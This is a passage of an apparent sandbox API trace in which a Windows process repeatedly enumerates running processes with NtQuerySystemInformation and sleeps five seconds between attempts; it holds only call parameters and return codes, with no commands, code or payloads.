Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.962] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.975] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.992] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.006] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.022] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.273] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.286] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.306] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.320] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.333] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.350] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.364] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.381] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.395] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.411] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.429] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.454] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.473] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.492] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.505] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.522] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, 